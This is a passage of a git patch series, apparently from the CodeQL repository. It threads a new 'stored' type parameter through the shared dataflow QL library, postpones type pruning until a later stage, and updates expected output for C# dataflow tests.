MakeImpl Lang> { DataFlowCall call, ArgNodeEx arg, Cc cc, CcCall innerCc, SummaryCtx summaryCtx, SummaryCtxSome innerSummaryCtx ) { - exists(ParamNodeEx p, FlowState state, Typ t, Ap ap | - fwdFlowIsEntered0(call, arg, cc, innerCc, summaryCtx, p, state, t, ap) and - innerSummaryCtx = TSummaryCtxSome(p, state, t, ap) + exists(ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored | + fwdFlowIsEntered0(call, arg, cc, innerCc, summaryCtx, p, state, t, ap, stored) and + innerSummaryCtx = TSummaryCtxSome(p, state, t, ap, stored) ) } pragma[nomagic] private predicate storeStepFwd(NodeEx node1, Ap ap1, Content c, NodeEx node2, Ap ap2) { - fwdFlowStore(node1, _, ap1, c, _, node2, _, _, _) and + fwdFlowStore(node1, _, ap1, _, c, _, _, node2, _, _, _) and ap2 = apCons(c, ap1) and readStepFwd(_, ap2, c, _, _) } pragma[nomagic] private predicate readStepFwd(NodeEx n1, Ap ap1, Content c, NodeEx n2, Ap ap2) { - fwdFlowRead(n1, _, ap1, c, n2, _, ap2, _, _, _) + fwdFlowRead(n1, _, ap1, _, c, n2, _, ap2, _, _, _, _) } pragma[nomagic] @@ -2131,17 +2169,18 @@ module MakeImpl Lang> { DataFlowCall call, FlowState state, CcCall ccc, Ap ap, ApApprox apa, RetNodeEx ret, SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa ) { - fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, apa, ret, innerSummaryCtx, innerArgApa) + fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, apa, _, ret, innerSummaryCtx, + innerArgApa) } pragma[nomagic] private predicate returnFlowsThrough( RetNodeEx ret, ReturnPosition pos, FlowState state, CcCall ccc, ParamNodeEx p, Typ argT, - Ap argAp, ApApprox argApa, Ap ap + Ap argAp, ApApprox argApa, TypOption argStored, Ap ap ) { exists(DataFlowCall call, ApApprox apa, boolean allowsFieldFlow | - returnFlowsThrough0(call, state, ccc, ap, apa, ret, TSummaryCtxSome(p, _, argT, argAp), - argApa) and + returnFlowsThrough0(call, state, ccc, ap, apa, ret, + TSummaryCtxSome(p, _, argT, argAp, argStored), argApa) and flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow, argApa, apa) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -2152,12 +2191,13 @@ module MakeImpl Lang> { private predicate flowThroughIntoCall( DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, boolean allowsFieldFlow, Ap argAp, Ap ap ) { - exists(ApApprox argApa, Typ argT | + exists(ApApprox argApa, Typ argT, TypOption argStored | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), - pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), ap) and + pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), + pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, allowsFieldFlow, argApa) and fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), - pragma[only_bind_into](argApa)) and + pragma[only_bind_into](argApa), pragma[only_bind_into](argStored)) and if allowsFieldFlow = false then argAp instanceof ApNil else any() ) } @@ -2168,7 +2208,7 @@ module MakeImpl Lang> { ) { exists(ApApprox apa, boolean allowsFieldFlow | flowIntoCallApaTaken(call, c, arg, p, allowsFieldFlow, apa) and - fwdFlow(arg, _, _, _, _, ap, apa) and + fwdFlow(arg, _, _, _, _, ap, apa, _) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) } @@ -2180,7 +2220,7 @@ module MakeImpl Lang> { ) { exists(ApApprox apa, boolean allowsFieldFlow | PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) and - fwdFlow(ret, _, _, _, _, ap, apa) and + fwdFlow(ret, _, _, _, _, ap, apa, _) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() | @@ -2203,14 +2243,14 @@ module MakeImpl Lang> { NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { revFlow0(node, state, returnCtx, returnAp, ap) and - fwdFlow(node, state, _, _, _, ap, _) + fwdFlow(node, state, _, _, _, ap, _, _) } pragma[nomagic] private predicate revFlow0( NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { - fwdFlow(node, state, _, _, _, ap, _) and + fwdFlow(node, state, _, _, _, ap, _, _) and sinkNode(node, state) and ( if hasSinkCallCtx() @@ -2261,7 +2301,7 @@ module MakeImpl Lang> { // flow out of a callable exists(ReturnPosition pos | revFlowOut(_, node, pos, state, _, _, _, ap) and - if returnFlowsThrough(node, pos, state, _, _, _, _, _, ap) + if returnFlowsThrough(node, pos, state, _, _, _, _, _, _, ap) then ( returnCtx = TReturnCtxMaybeFlowThrough(pos) and returnAp = apSome(ap) @@ -2338,7 +2378,7 @@ module MakeImpl Lang> { predicate dataFlowNonCallEntry(DataFlowCallable c, boolean cc) { exists(NodeEx node, FlowState state, ApNil nil | - fwdFlow(node, state, _, _, _, nil, _) and + fwdFlow(node, state, _, _, _, nil, _, _) and sinkNode(node, state) and (if hasSinkCallCtx() then cc = true else cc = false) and c = node.getEnclosingCallable() @@ -2423,7 +2463,7 @@ module MakeImpl Lang> { ) { exists(RetNodeEx ret, FlowState state, CcCall ccc | revFlowOut(call, ret, pos, state, returnCtx, _, returnAp, ap) and - returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, ap) and + returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, _, ap) and matchesCall(ccc, call) ) } @@ -2492,7 +2532,7 @@ module MakeImpl Lang> { pragma[nomagic] predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap) { exists(ReturnPosition pos | - returnFlowsThrough(_, pos, _, _, p, _, ap, _, _) and + returnFlowsThrough(_, pos, _, _, p, _, ap, _, _, _) and parameterFlowsThroughRev(p, ap, pos, _) ) } @@ -2502,7 +2542,7 @@ module MakeImpl Lang> { exists(Ap ap0 | parameterMayFlowThrough(p, _) and revFlow(n, state, TReturnCtxMaybeFlowThrough(_), _, ap0) and - fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap), _, ap0, _) + fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap, _), _, ap0, _, _) ) } @@ -2521,7 +2561,7 @@ module MakeImpl Lang> { pragma[nomagic] predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind) { exists(ParamNodeEx p, ReturnPosition pos | - returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, ap) and + returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, _, ap) and parameterFlowsThroughRev(p, argAp, pos, ap) and kind = pos.getKind() ) @@ -2795,8 +2835,11 @@ module MakeImpl Lang> { */ additional module Graph { private newtype TPathNode = - TPathNodeMid(NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap) { - fwdFlow(node, state, cc, summaryCtx, t, ap, _) and + TPathNodeMid( + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, + TypOption stored + ) { + fwdFlow(node, state, cc, summaryCtx, t, ap, _, stored) and revFlow(node, state, _, _, ap) } or TPathNodeSink(NodeEx node, FlowState state) { @@ -2937,8 +2980,9 @@ module MakeImpl Lang> { SummaryCtx summaryCtx; Typ t; Ap ap; + TypOption stored; - PathNodeMid() { this = TPathNodeMid(node, state, cc, summaryCtx, t, ap) } + PathNodeMid() { this = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) } override NodeEx getNodeEx() { result = node } @@ -3006,6 +3050,12 @@ module MakeImpl Lang> { ) } + private string ppStored() { + exists(string ppt | ppt = stored.toString() | + if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt + ) + } + private string ppCtx() { result = " <" + cc + ">" } private string ppSummaryCtx() { @@ -3015,7 +3065,9 @@ module MakeImpl Lang> { result = " <" + summaryCtx + ">" } - override string toString() { result = node.toString() + this.ppType() + this.ppAp() } + override string toString() { + result = node.toString() + this.ppType() + this.ppAp() + this.ppStored() + } /** * Gets a textual representation of this element, including a textual @@ -3023,7 +3075,8 @@ module MakeImpl Lang> { */ string toStringWithContext() { result = - node.toString() + this.ppType() + this.ppAp() + this.ppCtx() + this.ppSummaryCtx() + node.toString() + this.ppType() + this.ppAp() + this.ppStored() + this.ppCtx() + + this.ppSummaryCtx() } override predicate isSource() { @@ -3093,41 +3146,43 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInStep( ArgNodeEx arg, ParamNodeEx p, FlowState state, Cc outercc, CcCall innercc, - SummaryCtx outerSummaryCtx, SummaryCtx innerSummaryCtx, Typ t, Ap ap + SummaryCtx outerSummaryCtx, SummaryCtx innerSummaryCtx, Typ t, Ap ap, TypOption stored ) { FwdFlowInNoThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, _) and + ap, _, stored, _) and innerSummaryCtx = TSummaryCtxNone() or FwdFlowInThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, _) and - innerSummaryCtx = TSummaryCtxSome(p, state, t, ap) + ap, _, stored, _) and + innerSummaryCtx = TSummaryCtxSome(p, state, t, ap, stored) } pragma[nomagic] private predicate fwdFlowThroughStep0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa ) { - fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, ret, innerSummaryCtx, - innerArgApa) + fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, + innerSummaryCtx, innerArgApa) } - bindingset[node, state, cc, summaryCtx, t, ap] + bindingset[node, state, cc, summaryCtx, t, ap, stored] pragma[inline_late] private PathNodeImpl mkPathNode( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, + TypOption stored ) { - result = TPathNodeMid(node, state, cc, summaryCtx, t, ap) + result = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) } private PathNodeImpl typeStrengthenToPathNode( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, + TypOption stored ) { exists(Typ t | - fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, _) and - result = TPathNodeMid(node, state, cc, summaryCtx, t, ap) + fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, _, stored) and + result = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) ) } @@ -3135,32 +3190,34 @@ module MakeImpl Lang> { private predicate fwdFlowThroughStep1( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - RetNodeEx ret, ApApprox innerArgApa + TypOption stored, RetNodeEx ret, ApApprox innerArgApa ) { exists( FlowState state0, ArgNodeEx arg, SummaryCtxSome innerSummaryCtx, ParamNodeEx p, - Typ innerArgT, Ap innerArgAp + Typ innerArgT, Ap innerArgAp, TypOption innerArgStored | - fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, ret, + fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, innerSummaryCtx, innerArgApa) and - innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp) and - pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp) and - pn2 = typeStrengthenToPathNode(p, state0, ccc, innerSummaryCtx, innerArgT, innerArgAp) and - pn3 = mkPathNode(ret, state, ccc, innerSummaryCtx, t, ap) + innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp, innerArgStored) and + pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp, innerArgStored) and + pn2 = + typeStrengthenToPathNode(p, state0, ccc, innerSummaryCtx, innerArgT, innerArgAp, + innerArgStored) and + pn3 = mkPathNode(ret, state, ccc, innerSummaryCtx, t, ap, stored) ) } pragma[nomagic] private predicate fwdFlowThroughStep2( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, NodeEx node, Cc cc, - FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap + FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { exists( DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, ApApprox innerArgApa, ApApprox apa | - fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, apa, ret, - innerArgApa) and + fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, apa, + stored, ret, innerArgApa) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -3169,10 +3226,10 @@ module MakeImpl Lang> { private predicate localStep( PathNodeImpl pn1, NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, - Ap ap, string label, boolean isStoreStep + Ap ap, TypOption stored, string label, boolean isStoreStep ) { exists(NodeEx mid, FlowState state0, Typ t0, LocalCc localCc | - pn1 = TPathNodeMid(mid, state0, cc, summaryCtx, t0, ap) and + pn1 = TPathNodeMid(mid, state0, cc, summaryCtx, t0, ap, stored) and localCc = getLocalCc(cc) and isStoreStep = false | @@ -3184,18 +3241,18 @@ module MakeImpl Lang> { ) or // store - exists(NodeEx mid, Content c, Typ t0, Ap ap0 | - pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and - fwdFlowStore(mid, t0, ap0, c, t, node, state, cc, summaryCtx) and + exists(NodeEx mid, Content c, Typ t0, Ap ap0, TypOption stored0 | + pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0, stored0) and + fwdFlowStore(mid, t0, ap0, stored0, c, t, stored, node, state, cc, summaryCtx) and ap = apCons(c, ap0) and label = "" and isStoreStep = true ) or // read - exists(NodeEx mid, Typ t0, Ap ap0 | - pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and - fwdFlowRead(mid, t0, ap0, _, node, t, ap, state, cc, summaryCtx) and + exists(NodeEx mid, Typ t0, Ap ap0, TypOption stored0 | + pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0, stored0) and + fwdFlowRead(mid, t0, ap0, stored0, _, node, t, ap, stored, state, cc, summaryCtx) and label = "" and isStoreStep = false ) @@ -3204,10 +3261,10 @@ module MakeImpl Lang> { private predicate localStep(PathNodeImpl pn1, PathNodeImpl pn2, string label) { exists( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, - boolean isStoreStep + TypOption stored, boolean isStoreStep | - localStep(pn1, node, state, cc, summaryCtx, t0, ap, label, isStoreStep) and - pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap) and + localStep(pn1, node, state, cc, summaryCtx, t0, ap, stored, label, isStoreStep) and + pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap, stored) and stepFilter(node, ap, isStoreStep) ) or @@ -3235,11 +3292,11 @@ module MakeImpl Lang> { private predicate nonLocalStep( PathNodeImpl pn1, NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, - Ap ap, string label + Ap ap, TypOption stored, string label ) { // jump exists(NodeEx mid, FlowState state0, Typ t0 | - pn1 = TPathNodeMid(mid, state0, _, _, t0, ap) and + pn1 = TPathNodeMid(mid, state0, _, _, t0, ap, stored) and cc = ccNone() and summaryCtx = TSummaryCtxNone() | @@ -3264,15 +3321,16 @@ module MakeImpl Lang> { or // flow into a callable exists(ArgNodeEx arg, Cc outercc, SummaryCtx outerSummaryCtx | - pn1 = TPathNodeMid(arg, state, outercc, outerSummaryCtx, t, ap) and - fwdFlowInStep(arg, node, state, outercc, cc, outerSummaryCtx, summaryCtx, t, ap) and + pn1 = TPathNodeMid(arg, state, outercc, outerSummaryCtx, t, ap, stored) and + fwdFlowInStep(arg, node, state, outercc, cc, outerSummaryCtx, summaryCtx, t, ap, + stored) and label = "" ) or // flow out of a callable exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow, ApApprox apa | - pn1 = TPathNodeMid(ret, state, innercc, summaryCtx, t, ap) and - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa) and + pn1 = TPathNodeMid(ret, state, innercc, summaryCtx, t, ap, stored) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and fwdFlowOutValidEdge(_, ret, innercc, _, node, cc, apa, allowsFieldFlow) and not inBarrier(node, state) and label = "" and @@ -3281,9 +3339,12 @@ module MakeImpl Lang> { } private predicate nonLocalStep(PathNodeImpl pn1, PathNodeImpl pn2, string label) { - exists(NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap | - nonLocalStep(pn1, node, state, cc, summaryCtx, t0, ap, label) and - pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap) and + exists( + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, + TypOption stored + | + nonLocalStep(pn1, node, state, cc, summaryCtx, t0, ap, stored, label) and + pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap, stored) and stepFilter(node, ap, false) ) } @@ -3298,10 +3359,10 @@ module MakeImpl Lang> { ) { exists( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, - PathNodeImpl out0 + TypOption stored, PathNodeImpl out0 | - fwdFlowThroughStep2(arg, par, ret, node, cc, state, summaryCtx, t0, ap) and - out0 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap) and + fwdFlowThroughStep2(arg, par, ret, node, cc, state, summaryCtx, t0, ap, stored) and + out0 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap, stored) and stepFilter(node, ap, false) | out = out0 or out = out0.(PathNodeMid).projectToSink(_) @@ -3573,14 +3634,13 @@ module MakeImpl Lang> { int tfnodes, int tftuples ) { fwd = true and - nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _)) and + nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _, _)) and fields = count(Content f0 | fwdConsCand(f0, _)) and conscand = count(Content f0, Ap ap | fwdConsCand(f0, ap)) and - states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _)) and + states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _, _)) and tuples = - count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap | - fwdFlow(n, state, cc, summaryCtx, t, ap, _) - ) and + count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, + TypOption stored | fwdFlow(n, state, cc, summaryCtx, t, ap, _, stored)) and calledges = count(DataFlowCall call, DataFlowCallable c | FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll index 75d68cf247c..4016199ccec 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll @@ -891,6 +891,8 @@ module MakeImplCommon Lang> { nodeDataFlowType(this.asNode(), result) or nodeDataFlowType(this.asParamReturnNode(), result) + or + isTopType(result) and this.isImplicitReadNode(_) } pragma[inline] From b65a4e45ab00cb5422821675c5c1a3cb3c5f36b3 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Fri, 22 Nov 2024 10:18:32 +0100 Subject: [PATCH 0775/1267] Dataflow: Postpone type pruning until stage 5. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 1076957db5e..6c91017ee8a 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -3931,7 +3931,7 @@ module MakeImpl Lang> { private module Stage4Param implements MkStage::StageParam { private module PrevStage = Stage3; - class Typ = DataFlowType; + class Typ = Unit; class Ap = AccessPathFront; @@ -3939,7 +3939,7 @@ module MakeImpl Lang> { PrevStage::Ap getApprox(Ap ap) { result = ap.toApprox() } - Typ getTyp(DataFlowType t) { result = t } + Typ getTyp(DataFlowType t) { any() } bindingset[c, tail] Ap apCons(Content c, Ap tail) { result.getHead() = c and exists(tail) } @@ -3964,9 +3964,10 @@ module MakeImpl Lang> { NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue, Typ t, LocalCc lcc, string label ) { - Stage3Param::localFlowBigStep(node1, state1, node2, state2, preservesValue, t, _, label) and + Stage3Param::localFlowBigStep(node1, state1, node2, state2, preservesValue, _, _, label) and PrevStage::revFlow(node1, pragma[only_bind_into](state1), _) and PrevStage::revFlow(node2, pragma[only_bind_into](state2), _) and + exists(t) and exists(lcc) } @@ -4015,7 +4016,7 @@ module MakeImpl Lang> { predicate filter(NodeEx node, FlowState state, Typ t0, Ap ap, Typ t) { exists(state) and not clear(node, ap) and - strengthenType(node, t0, t) and + t0 = t and ( notExpectsContent(node) or @@ -4029,7 +4030,7 @@ module MakeImpl Lang> { } bindingset[t1, t2] - predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } + predicate typecheck(Typ t1, Typ t2) { any() } } private module Stage4 = MkStage::Stage; From 9734cff15b4c435ba97e3a1698ee9a0eae789d24 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 3 Dec 2024 12:57:44 +0100 Subject: [PATCH 0776/1267] Java/C#: Update expected files. --- .../collections/CollectionFlow.expected | 10 +- .../dataflow/fields/FieldFlow.expected | 24 +- .../dataflow/global/DataFlowPath.expected | 6 +- .../global/TaintTrackingPath.expected | 6 +- .../dataflow/capture/inlinetest.expected | 144 +-- .../frameworks/android/intent/test.expected | 1009 ----------------- .../android/notification/test.expected | 80 -- 7 files changed, 95 insertions(+), 1184 deletions(-) diff --git a/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected b/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected index 18155300ff0..d6b79d7ae6b 100644 --- a/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected +++ b/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected @@ -249,9 +249,9 @@ edges | CollectionFlow.cs:308:9:308:12 | [post] access to local variable list : List [element, property Key] : A | CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | provenance | | | CollectionFlow.cs:308:18:308:47 | object creation of type KeyValuePair : KeyValuePair [property Key] : A | CollectionFlow.cs:308:9:308:12 | [post] access to local variable list : List [element, property Key] : A | provenance | MaD:3 | | CollectionFlow.cs:308:43:308:43 | access to local variable a : A | CollectionFlow.cs:308:18:308:47 | object creation of type KeyValuePair : KeyValuePair [property Key] : A | provenance | MaD:13 | -| CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | provenance | MaD:18 | -| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | provenance | | -| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:24 | access to property Key | provenance | | +| CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | provenance | MaD:18 | +| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | provenance | | +| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:24 | access to property Key | provenance | | | CollectionFlow.cs:328:32:328:38 | element : A | CollectionFlow.cs:328:55:328:61 | access to parameter element : A | provenance | | | CollectionFlow.cs:328:44:328:48 | [post] access to parameter array : A[] [element] : A | CollectionFlow.cs:328:23:328:27 | array [Return] : A[] [element] : A | provenance | | | CollectionFlow.cs:328:55:328:61 | access to parameter element : A | CollectionFlow.cs:328:44:328:48 | [post] access to parameter array : A[] [element] : A | provenance | | @@ -559,8 +559,8 @@ nodes | CollectionFlow.cs:308:18:308:47 | object creation of type KeyValuePair : KeyValuePair [property Key] : A | semmle.label | object creation of type KeyValuePair : KeyValuePair [property Key] : A | | CollectionFlow.cs:308:43:308:43 | access to local variable a : A | semmle.label | access to local variable a : A | | CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | semmle.label | access to local variable list : List [element, property Key] : A | -| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | semmle.label | kvp : KeyValuePair [property Key] : A | -| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | semmle.label | access to parameter kvp : KeyValuePair [property Key] : A | +| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | semmle.label | kvp : KeyValuePair [property Key] : A | +| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | semmle.label | access to parameter kvp : KeyValuePair [property Key] : A | | CollectionFlow.cs:311:18:311:24 | access to property Key | semmle.label | access to property Key | | CollectionFlow.cs:328:23:328:27 | array [Return] : A[] [element] : A | semmle.label | array [Return] : A[] [element] : A | | CollectionFlow.cs:328:32:328:38 | element : A | semmle.label | element : A | diff --git a/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected b/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected index e4cf0bb2673..50fa7b06416 100644 --- a/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected +++ b/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected @@ -812,10 +812,10 @@ edges | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | H.cs:33:19:33:19 | a : A [field FieldA] : Object | provenance | | | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | H.cs:106:16:106:40 | call to method Transform : B [field FieldB] : Object | provenance | | | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | H.cs:106:16:106:40 | call to method Transform : B [field FieldB] : Object | provenance | | -| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | provenance | | -| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | provenance | | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | +| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | provenance | | +| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | provenance | | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | H.cs:113:31:113:31 | access to local variable a : A [field FieldA] : Object | provenance | | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | H.cs:113:31:113:31 | access to local variable a : A [field FieldA] : Object | provenance | | | H.cs:112:20:112:36 | call to method Source : Object | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | provenance | | @@ -908,14 +908,14 @@ edges | H.cs:165:17:165:27 | (...) ... : B | H.cs:165:13:165:13 | access to local variable b : B | provenance | | | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | H.cs:165:13:165:13 | access to local variable b : B [field FieldB] : Object | provenance | | | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | H.cs:165:13:165:13 | access to local variable b : B [field FieldB] : Object | provenance | | -| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | provenance | | -| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | provenance | | +| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | 